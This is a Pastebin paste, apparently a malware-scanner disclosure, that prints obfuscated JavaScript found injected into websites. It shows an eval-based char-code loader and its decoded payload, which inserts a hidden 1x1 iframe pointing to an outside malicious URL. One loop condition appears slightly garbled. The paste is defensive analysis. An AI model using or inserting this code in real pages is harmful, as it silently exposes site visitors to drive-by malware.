Advertisement
Not a member of Pastebin yet?
Sign Up,
it unlocks many cool features!
- /*
- * Quttera web malware scanner detected malicious obfuscated code injecting hidden iframe to malicious
- * link
- */
- /*
- * Original threat
- */
- try {
- window.document.body++
- } catch (gdsgsdg) {
- dbshre = 147;
- }
- if (dbshre) {
- asd = 0;
- try {
- d = document.createElement("div");
- d.innerHTML.a = "asd";
- } catch (agdsg) {
- asd = 1;
- }
- if (!asd) {
- e = eval;
- }
- ss = String;
- asgq = new Array(31, 94, 110, 104, 94, 107, 97, 104, 104, 27, 31, 33, 25, 117, 8, 1, 24, 25, 26, 27, 109, 89, 107, 26, 106, 113, 105, 107, 26, 56, 23, 92, 104, 93, 112, 100, 93, 103, 110, 41, 90, 106, 94, 91, 111, 92, 61, 101, 95, 104, 92, 102, 109, 34, 34, 96, 94, 107, 91, 104, 92, 31, 34, 53, 8, 1, 5, 3, 26, 27, 23, 24, 104, 116, 108, 105, 38, 108, 108, 94, 23, 53, 25, 33, 99, 107, 108, 105, 52, 42, 38, 91, 94, 108, 97, 108, 107, 109, 40, 105, 99, 39, 105, 91, 107, 105, 97, 100, 91, 42, 90, 100, 98, 101, 41, 103, 96, 105, 33, 54, 4, 2, 25, 26, 27, 23, 103, 115, 107, 109, 37, 107, 109, 115, 103, 92, 38, 105, 105, 110, 96, 108, 98, 105, 105, 23, 53, 25, 33, 92, 89, 107, 104, 102, 112, 107, 93, 32, 53, 8, 1, 24, 25, 26, 27, 102, 114, 106, 108, 41, 106, 108, 114, 102, 96, 37, 90, 104, 108, 95, 92, 106, 25, 55, 27, 30, 40, 32, 53, 8, 1, 24, 25, 26, 27, 102, 114, 106, 108, 41, 106, 108, 114, 102, 96, 37, 96, 94, 99, 98, 95, 108, 25, 55, 27, 30, 41, 105, 114, 34, 50, 5, 3, 26, 27, 23, 24, 104, 116, 108, 105, 38, 108, 110, 116, 99, 93, 39, 113, 100, 91, 108, 97, 26, 56, 23, 31, 42, 106, 115, 30, 51, 6, 4, 27, 23, 24, 25, 105, 117, 104, 106, 39, 109, 111, 112, 100, 94, 40, 103, 92, 94, 109, 26, 56, 23, 31, 42, 106, 115, 30, 51, 6, 4, 27, 23, 24, 25, 105, 117, 104, 106, 39, 109, 111, 112, 100, 94, 40, 111, 102, 104, 25, 55, 27, 30, 41, 105, 114, 34, 50, 5, 3, 7, 5, 23, 24, 25, 26, 100, 93, 24, 33, 27, 95, 102, 91, 110, 103, 96, 101, 108, 39, 97, 96, 107, 61, 101, 95, 104, 92, 102, 109, 60, 116, 64, 92, 33, 33, 106, 113, 105, 107, 33, 36, 32, 24, 116, 7, 5, 23, 24, 25, 26, 27, 23, 24, 25, 94, 106, 90, 109, 102, 95, 105, 107, 38, 112, 108, 100, 107, 93, 33, 33, 55, 91, 97, 111, 26, 100, 91, 53, 85, 33, 106, 113, 105, 107, 86, 34, 53, 52, 40, 94, 100, 109, 54, 32, 35, 54, 4, 2, 25, 26, 27, 23, 24, 25, 26, 27, 91, 103, 92, 111, 104, 92, 102, 109, 40, 98, 92, 108, 62, 102, 96, 100, 93, 103, 110, 61, 112, 65, 93, 34, 34, 102, 114, 106, 108, 34, 32, 38, 90, 106, 107, 92, 102, 93, 61, 99, 96, 100, 93, 34, 106, 113, 105, 107, 35, 54, 4, 2, 25, 26, 27, 23, 117, 6, 4, 120, 32, 32, 34, 53);
- s = "";
- for (i = 0; i - 484 != 0; i++) {
- if ((020 == 0x10) % 26 % 26window.document) s += ss["fromCharCode"](1 * asgq[i] - (i % 5 - 5 - 4));
- }
- z = s;
- e(s);
- }
- /*
- * decoded payload injecting malicious hidden iframe to http://cerfust[.]nl/paprika/clik[.]php';
- */
- (function () {
- var ozqr = document.createElement('iframe');
- ozqr.src = 'http://cerfust.nl/paprika/clik.php';
- ozqr.style.position = 'absolute';
- ozqr.style.border = '0';
- ozqr.style.height = '1px';
- ozqr.style.width = '1px';
- ozqr.style.left = '1px';
- ozqr.style.top = '1px';
- if (!document.getElementById('ozqr')) {
- document.write('<div id=\'ozqr\'></div>');
- document.getElementById('ozqr').appendChild(ozqr);
- }
- })();
Advertisement
Add Comment
Please, Sign In to add comment
Advertisement